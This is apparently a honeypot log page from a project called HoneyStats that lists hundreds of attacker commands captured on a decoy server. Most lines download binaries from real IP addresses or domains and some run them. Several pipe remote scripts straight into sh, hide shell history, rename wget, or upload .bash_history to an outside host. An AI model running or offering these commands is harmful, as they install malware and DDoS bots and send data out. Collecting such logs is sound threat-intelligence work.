wget -c http://222.186.51.168:7712/ssbin
wget http://115.239.248.35:22/ddd1
wget http://115.239.248.35:22/bbbb
wget http://58.221.66.4:9250/wangzhe
wget http://58.221.66.4:9250/kuanshen
wget -q http://12.226.89.160/p.pl
wget http://221.229.172.44:81/g7d5 chmod +x g7d5 ./g7d5
wget -O /tmp/10771 http://103.56.112.178:1234/10771
wget http://5.189.186.3/bins.sh
wget http://104.223.10.160:81/f6ho chmod +x f6ho ./f6ho
wget -O /tmp/im.exe http://103.56.112.178:1234/im.exe
wget -c http://222.186.51.168:7712/vubin
wget -q http://catsmeowalot.com/p.pl
wget http://catsmeowalot.com/p.pl
wget http://12.226.89.160/gtop.sh
curl -O http://12.226.89.160/gtop.sh
wget http://103.56.112.178:1234/10771
wget http://103.56.112.178:1234/10991
wget -c http://222.186.51.168:7712/bubin
wget -q http://101.100.183.210/p.pl
wget http://101.100.183.210/gtop.sh
curl -O http://101.100.183.210/gtop.sh
wget http://103.56.112.178:1234/xudp
wget http://103.56.112.178:1234/Linux2.6
wget -O /tmp/xudp http://103.56.112.178:1234/xudp
wget -O /tmp/Manager http://103.56.115.43/Manager
wget http://222.186.130.205:9999/aaaaa
wget http://222.186.130.205:9999/2222
wget http://222.186.130.205:6666/4444
wget http://222.186.130.205:6666/1111
wget http://222.186.130.205:6666/3333
wget http://180.97.237.42:3311/Linux2.6
wget http://180.97.237.42:3311/33333333.exe
wget http://104.223.10.160:81/e38sd chmod +x e38sd ./e38sd
wget http://222.186.130.205:6666/2222
wget -c -P /tmp http://182.161.39.77:1/xxj
curl -O http://212.154.211.81/ssh.txt
wget http://212.154.211.81/ssh.txt
wget http://202.102.72.217:59510/shyadmin
wget http://198.55.114.226:8080/dg66
wget -O /tmp/shyadmin http://202.102.72.217:59510/shyadmin
wget -c http://61.188.39.15:3431/LIVE8
wget -c http://202.102.72.217:59510/shyadmin
wget http://104.129.35.3:81/i9os chmod +x i9os ./i9os
wget -c http://103.56.115.43/Linux2.4
wget http://115.239.248.35:1/bbbb
wget http://115.239.248.35:1/ddd1
wget http://115.239.248.35:1/110
wget http://115.239.248.35:1/jjxx
wget http://115.239.248.35:1/xxjj
wget -O /tmp/Say_25000 http://211.127.220.60:809/Say_25000
wget http://198.55.114.226:8080/Dg520
wget -O /tmp/xp http://59.56.111.136:6666/xp
wget http://115.239.248.54:3/host1
wget http://115.239.248.54:2/clown
wget http://183.60.111.83/sadsa
wget http://115.239.248.53:123/XX00
wget http://115.239.248.53:123/00XX
wget -O /tmp/xp http://115.159.83.49:8888/xp
wget -c http://180.178.55.106:50668/beeb
wget -c http://180.178.55.106:50668/ces
wget -O /tmp/mo http://42.51.217.2:1998/mo
wget http://115.239.248.50:1/wa
wget http://115.239.248.50:1/aw
wget http://115.239.248.35:1/nnnn
wget http://222.186.3.97:5953/ludp
wget http://222.186.3.97:5953/lsyn
wget http://155.94.161.147:81/g7d5 chmod +x g7d5 ./g7d5
wget -c http://211.155.229.230:5198/chao
wget -c http://115.231.218.173:9534/dwm
wget http://115.239.248.50:1/ces
wget -c http://211.155.229.230:5198/ces
wget http://218.2.0.155:5569/ma123
wget http://115.239.248.35:1/kkd
wget -c http://115.239.248.35:1/kkd
wget -c http://115.239.248.35:1/kkf
wget -c -P /tmp http://115.239.248.35:1/kkd
wget -c -P /tmp http://115.239.248.35:1/kkf
wget http://218.2.0.127:5569/ttp
wget http://36.251.184.196:32156/ss1
wget http://115.239.248.50:1/mmmm
wget -c http://36.251.184.196:32156/ss1
wget http://115.239.248.50:31232/mmmm
wget -c http://115.230.126.82:11315/u1
wget -O /tmp/ntpd http://obuwzh17v.bkt.clouddn.com/ntpd
wget http://115.239.248.35:777/Vo
wget http://115.239.248.50:3234/mmmm
wget http://115.239.248.50:3234/qqb
wget http://115.239.248.50:3234/qqc
wget -c http://115.231.220.21:31589/u1
wget http://115.239.248.50:12312/mmmm
wget http://115.239.248.50:3322/mmmm
wget http://115.239.248.50:3322/java
wget -O /tmp/etc168 http://113.107.249.213:8081/etc168
wget http://222.186.11.70:8099/Linux-udp43145
wget http://222.186.11.70:8099/Linux-syn43145
wget http://45.114.129.76:876/yxhl
wget http://103.40.102.2:8090/udp
wget http://115.238.237.76:8080/zgvk123.0
wget http://221.229.172.44:81/i37rj chmod +x i37rj ./i37rj
wget http://183.131.83.245:642/wi
wget -c http://211.155.229.230:5198/rwd
wget http://59.63.166.70:81/f6ho chmod +x f6ho ./f6ho
wget http://221.229.172.44:81/f6ho chmod +x f6ho ./f6ho
wget http://183.131.83.245:642/mms
cd /usr/bin/wget chmod 0755 wget
wget -O /tmp/bin.sh http://115.159.83.49:8888/bin.sh
wget http://221.229.172.44:81/h8r9 chmod +x h8r9 ./h8r9
wget http://59.63.166.70:81/h8r9 chmod +x h8r9 ./h8r9
wget -c http://211.155.229.230:5198/aiai
wget -c http://211.155.229.230:5198/breeb
wget http://42.51.22.219/qweasd
wget -O /tmp/OG http://118.193.143.112:5060/OG
wget http://183.203.9.179:6667/mohan
wget http://118.193.143.112:5060/OG
wget -c http://47.89.24.181:8083/kuaikai
wget -O /tmp/g250 http://23.234.25.140:15828/g250
wget http://118.193.143.112:5060/DDos
wget -c http://115.231.217.109:11315/c33
wget -c http://115.231.217.109:11315/c32
wget http://115.239.248.72:12311/sarm
wget http://222.186.24.168:687/ttp
wget -c http://222.186.58.176:279/mmt
wget http://59.63.166.70:81/e38sd chmod +x e38sd ./e38sd
wget http://114.80.116.202:6667/mohan2.6
wget http://115.231.218.206:8080/qwert
wget http://101.200.139.74:258/kan21
wget http://101.200.139.74:258/66
wget -O /tmp/niuniu http://23.234.25.140:15828/niuniu
wget http://59.63.166.70:81/g7d5 chmod +x g7d5 ./g7d5
wget -c http://222.186.10.105:1022/xb132
wget -c http://222.186.10.105:1022/xb164
wget http://115.239.248.72:12311/aaoo
wget http://222.187.253.29:321/920.exe
wget http://222.186.11.70:8091/Linux-udp43145
wget http://222.186.11.70:8091/Linux-syn43145
wget -O /tmp/Linux2.4 http://104.223.6.246:5898/Linux2.4
wget -c http://222.186.10.105:1022/xb64
wget -c http://222.186.10.105:1022/xb32
wget -c http://222.186.10.105:1022/xbjj.1
wget -qO - http://192.210.237.210/x/2sh
wget -O /tmp/server http://115.239.248.72:123/server
wget http://183.203.9.179:6667/mohan2.6
wget http://114.80.116.202:6667/mohan
wget http://221.229.172.44:81/e38sd chmod +x e38sd ./e38sd
wget http://59.63.166.70:81/l39ac chmod +x l39ac ./l39ac
wget http://221.229.172.44:81/l39ac chmod +x l39ac ./l39ac
curl http://192.210.237.210/x/3sh
wget -qO - http://192.210.237.210/x/1sh
wget -c http://192.210.237.210/x/1sh -P /var/run
wget -qO /root/- http://192.210.237.210/x/2sh
wget -c http://192.210.237.210/x/2sh -P /tmp
wget http://221.229.172.44:81/s36oa chmod +x s36oa ./s36oa
wget -c http://115.239.248.72:123/qbqb
wget http://116.255.129.183/svshost.exe
wget http://221.229.172.44:81/i9os chmod +x i9os ./i9os
wget http://59.63.166.70:81/i9os chmod +x i9os ./i9os
wget http://116.255.129.183/tyui2.4
wget http://115.239.248.72:321/cesi
wget -c http://115.239.248.72:321/1.exe
wget http://115.239.248.72:321/1.exe
wget http://222.187.253.29:221/2299
wget http://116.255.129.183/tyui2.6
wget http://222.187.224.25:65432/55555
wget http://115.239.248.72:123/2299
wget http://14.17.115.54/tyui2.4
wget http://58.221.65.47:1144/Linux2.6cycy
wget http://58.221.65.47:1144/Linux2.4cycy
wget -O /tmp/Linux2.6 http://222.186.34.222:10086/Linux2.6
wget http://14.17.115.54/haha0987
wget http://14.17.115.54/tyui2.6
wget http://14.17.115.54/ikmj-arm
wget http://115.239.248.72:123/2299
wget http://124.231.136.248:687/wwe
wget http://14.17.115.54/ikmj-arm
wget http://114.55.41.239:81/123.rar
wget http://222.186.34.73:5566/Linu
PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://221.229.172.44:81/g7d5 chmod +x g7d5 ./g7d5
PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin wget http://104.223.11.102/g7d5 chmod +x g7d5 ./g7d5
wget http://14.17.115.54/Ludp25
wget http://14.17.115.54/mwmv782
wget http://14.17.115.54/mmmn009
wget http://14.17.115.54/mmmn008
wget http://14.17.115.54/mmmn007
wget http://119.61.18.182/mmmn007
wget -O /tmp/sys http://180.97.239.10:999/sys
wget -c http://103.232.89.227:5198/rwd
wget -c http://103.232.89.227:5198/breeb
wget manumtb.3x.ro/ManuMtb
wget http://123.249.3.193/dfgh881
wget -c http://103.20.249.191:5198/breeb
wget -O /tmp/sys http://104.148.61.195:280/sys
wget -c http://218.2.0.111:397/TAB
wget http://124.231.136.248:687/ss
wget -O /tmp/zx http://23.234.25.140:15828/zx
wget http://212.154.211.81/j.txt
curl -O http://212.154.211.81/j.txt
wget -c http://222.133.11.46:8080/udp
wget -c http://222.133.11.46:8080/000
wget http://115.231.222.116:1522/skkz
wget http://45.35.52.222:4455/Linu
curl http://192.210.237.210/x/3sh | sh
wget -qO - http://192.210.237.210/x/2sh | sh > /dev/null 2 >& 1 &
wget -c http://192.210.237.210/x/2sh -P /tmp
wget -qO - http://192.210.237.210/x/1sh | sh > /dev/null 2 >& 1 &
wget -c http://192.210.237.210/x/1sh -P /var/run
wget -O /tmp/haha http://222.186.56.69:8667/haha
wget -O /tmp/usrm http://aam.oss-cn-hangzhou.aliyuncs.com/usrm
wget -O /tmp/g251 http://23.234.25.140:15828/g251
wget -c http://104.148.61.35:6332/dd-wrt
wget http://119.29.233.48:5088/ss
wget http://115.239.230.223:8888/tes2
wget http://115.159.208.50:123/1.sh
wget -O /tmp/2500 http://115.231.218.37:44555/2500
wget -O /tmp/25002 http://222.186.34.70:15826/25002
PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin unset HISTFILE HISTLOG HISTORY HISTFILE=/dev/null HISTSIZE=0 cd /bin/ wget http://69.197.175.253/go.txt -O acxxxhruvc chmod + x acxxxhruvc /bin/acxxxhruvc good http://69.197.175.253/go.txt -O acxxxhruvc chmod + x acxxxhruvc /bin/acxxxhruvc sleep 2 mv /usr/bin/wget /usr/bin/good mv /bin/wget /bin/good ls -la /etc/daemon.cfg exit 0
wget http://45.34.191.131:8080/ccd
wget http://222.187.254.78:8081/fuyan
wget http://222.187.254.78:8081/fuyan1
wget http://115.239.230.223:8881/s12k
PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin unset HISTFILE HISTLOG HISTORY HISTFILE=/dev/null HISTSIZE=0 cd /bin/ wget http://173.208.219.116/go.txt -O acxxxhruvc chmod + x acxxxhruvc /bin/acxxxhruvc good http://173.208.219.116/go.txt -O acxxxhruvc chmod + x acxxxhruvc /bin/acxxxhruvc sleep 2 mv /usr/bin/wget /usr/bin/good mv /bin/wget /bin/good ls -la /etc/daemon.cfg exit 0
wget http://115.239.230.223:9999/vc2008z
wget http://115.239.230.223:9999/akjavc
wget http://115.239.230.223:9999/yao1
wget -c http://122.0.80.183:5198/rwd
wget -c http://122.0.80.183:5198/breeb
wget -qO - http://52.8.123.250/x/1sh | sh > /dev/null 2 >& 1 &
wget -c http://52.8.123.250/x/1sh -P /var/run
wget http://115.239.230.223:8881/kjkkkz
wget http : //115.239.230.223 : 3388/jdlsamjl
wget http : //115.239.230.223 : 8881/tusz
wget http : //116.255.171.20 : 321/Cesi
wget http : //116.255.171.20 : 321/scan
wget http : //116.255.171.20 : 8080/Sqfq
wget http : //192.184.40.82 : 8185/arm
wget http : //222.186.52.82 : 4080/Linx
wget http : //192.184.40.82 : 8185/ux2.6
curl -o /tmp/linux http : //23.234.25.140 : 15826/linux
wget http : //183.131.83.179 : 4080/Linsyn
wget http : //192.184.40.82 : 4233/xff
wget http : //222.186.30.246 : 9966/syndo1
wget http : //222.186.52.82 : 5566/netdos
wget http : //120.25.125.68 : 3322/netdos
curl -o /tmp/u251 http : //222.186.21.201 : 2014/u251
wget http://58.211.16.74:2/
wget http://58.211.16.74:2/xudp
curl -o /tmp/u251 http://222.186.21.201:2014/u251
curl -o /tmp/3.1415926 http://23.234.25.140:15826/3.1415926
curl http://121.40.175.22:15651/95 -o /tmp/gfty
curl -o /tmp/007 http://23.234.25.140:15826/007
curl -o /tmp/gpf http://23.234.25.140:15826/gpf
curl -o /tmp/1 http://23.234.25.140:15826/1
wget -P/root/ http://39.109.4.162/escds
curl -o /tmp/162 http://23.234.25.140:15826/162
wget -O /tmp/jweq http://222.186.56.5:801/jweq
wget -O /tmp/jweb http://222.186.56.5:801/jweb
wget -O /tmp/Client http://222.186.34.203:89/Client
wget -O /tmp/chinasyn http://222.186.34.203:89/chinasyn
wget -O /tmp/Someone915 http://222.186.34.203:89/Someone915
wget -O /tmp/bs http://222.186.34.203:88/bs
wget -O /tmp/sb http://222.186.34.203:88/sb
wget -O /tmp/Linux1992 http://222.186.34.203:88/Linux1992
wget -O /root/SingForYou http://222.186.34.203:88/SingForYou
wget -O /tmp/SingForYou http://222.186.34.203:88/SingForYou
curl -F "filename=@/tmp/0001z" http://222.186.31.181:8808/1/
curl -F "filename=@.bash_history" http://222.186.31.181:8808/1/
wget http://wwjj.keyipin.com/3e.exe
wget http://222.186.42.46:6989/1ca.rar
wget http://wwjj.keyipin.com/4e.exe
wget http://222.186.31.181:0218/hdksyn8
curl -o /tmp/25002 http://23.234.25.140:15826/25002
wget http://wwjj.keyipin.com/syn.zip
wget http://wwjj.keyipin.com/2e.exe
wget http://wwjj.keyipin.com/1e.exe
wget http://222.186.30.119:1/2.exe
wget http://222.186.30.119:1/1.exe
wget http://222.186.30.119:1/1e
wget http://wwjj.keyipin.com/12e.zip
wget -c http://61.147.107.109:7531/erepc
wget http://wwjj.keyipin.com/cs.rar
wget -c http://61.147.107.109:7531/fsta
wget http://222.186.30.160:1/ar.zip
wget http://appdown.keyipin.com/ScanB.zip
wget -c http://208.87.241.145:1000/images/sff
wget -c http://www.kudh.net/upload/pic/sff
wget -c http://108.186.146.232:8901/sff
wget -qO - http://104.199.135.124/bbsh | sh > /dev/null 2>&1 &
wget -c http://104.199.135.124/bbsh -P /var/run
wget -qO - http://104.199.135.124/wgsh | sh > /dev/null 2>&1 &
wget -c http://104.199.135.124/wgsh -P /tmp
wget -c http://jlcampus.cn/images/sff
wget http://111.73.46.214:885/b58858
wget http://111.73.46.214:885/a58858
wget -c http://222.186.59.91:65530/ssss
wget -c http://222.186.59.91:65529/ssss
wget -c http://222.186.59.91:6585/ssfff
do (wget -O $filename $list$filename || curl -o $filename $list$filename)
wget http://23.234.19.202/i/a08
wget -c http://222.186.59.91:6585/fisdo
wget http://104.143.5.13/i/a09.zip
wget http://104.143.5.13/i/a07.zip
wget http://nginx.org/download/nginx-1.6.2.tar.gz
wget -c http://www.sudi88.com/forms/font/sff
wget -c http://222.186.59.91:14552/sndddd
wget http://185.11.144.190/gb.sh
wget -c http://61.160.212.59:880/likds
wget -c http://61.160.212.59:880/32ouk
wget -c http://61.160.212.59:880/64rth
wget http://198.15.234.66/i/a06.zip
wget http://198.15.234.66/i/a09.zip
wget http://114.80.215.201:9527/TX981
wget http://38.68.17.37/i/a06.zip
wget http://198.15.234.66/i/a07.zip
wget -c http://222.186.59.91:14552/sfssfgg
wget -c http://222.186.59.91:14552/snddd
wget -c http://222.186.59.91:14552/sndd
wget -c http://222.186.59.91:52521/sndd
wget -c http://222.186.59.91:51855/asud
wget -c http://61.160.232.140:8000/aa
wget -c http://103.42.14.27:3584/fsag
wget -c http://103.42.14.27:3584/sfsfg
wget -c http://222.186.21.82:7589/xiao
wget -c http://222.186.57.11:6566/os
wget -c http://222.186.21.82:4568/xiao
wget -c http://118.193.241.19:695/syn1
wget -c http://118.193.241.19:695/udp1
wget -c http://216.99.151.186:7888/dao
wget -c http://222.186.190.157:8080/DDos
wget -c http://www.jlcampus.cn/images/sff
wget -c http://222.186.57.11:9965/123
wget -c http://222.186.59.91:8547/ddddd
wget -c http://222.186.59.91:8547/ssss
wget -c http://222.186.26.133:82/sff
wget -c http://199.83.94.89:7888/fuck
wget -c http://222.186.26.132:82/sff
wget -c http://222.186.26.133:81/sff
wget -c http://69.163.33.138:81/jjj
wget -c http://199.83.94.89:7888/wa
wget -c http://69.163.33.138:81/sff
wget http://60.190.216.221:999/DDos38
wget http://111.73.46.22:8080/8x
wget http://111.73.46.22:8080/cccc
wget -c http://103.228.130.151:82/yes
wget -c http://61.164.126.5:81/rss
wget -P/root/ http://107.150.63.178:88/disk
wget -c http://61.164.126.5:7401/sys
wget -c http://223.68.154.214:9191/159
wget -c http://61.106.13.11:7865/Fdb7303
wget -c http://222.186.21.55/tfedl
wget -c http://222.186.21.55/tfeds

Se vuoi guardare il codice che genera questa pagina, vai al sito del mio progetto HoneyStats! (github)

Vuoi ancora di più? Seguimi all'interno del laboratorio!